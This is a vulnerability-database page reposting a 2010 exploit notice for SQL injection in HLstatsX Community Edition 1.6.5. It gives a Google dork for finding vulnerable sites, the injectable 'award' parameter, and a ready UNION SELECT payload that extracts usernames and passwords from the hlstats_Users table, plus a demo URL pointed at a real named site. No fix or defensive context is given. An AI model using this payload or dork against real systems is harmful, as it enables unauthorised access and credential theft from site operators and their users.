HLstatsX Community Edition 1.6.5 remote SQL injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051383 漏洞类型
发布时间 2010-01-09 更新时间 2010-01-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010010029
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#############################################################
# HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

# Plugin Home: http://www.hlxcommunity.com/

# Author: Babora

# Site: www.1923turk.com
 
##############################################################


Google Dork: "hlstats.php?mode=" 
 
# Exploit: xxxxx.com/xxx/hlstats.php?mode=dailyawardinfo&award==[SQL-inj]


#    -99+union+select+1,2,concat(username,0x3a,password),4+from+hlstats_Users--&game=css
           
         

# Demo: http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat(username,0x3a,password),4+from+hlstats_Users--&game=css

 
##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################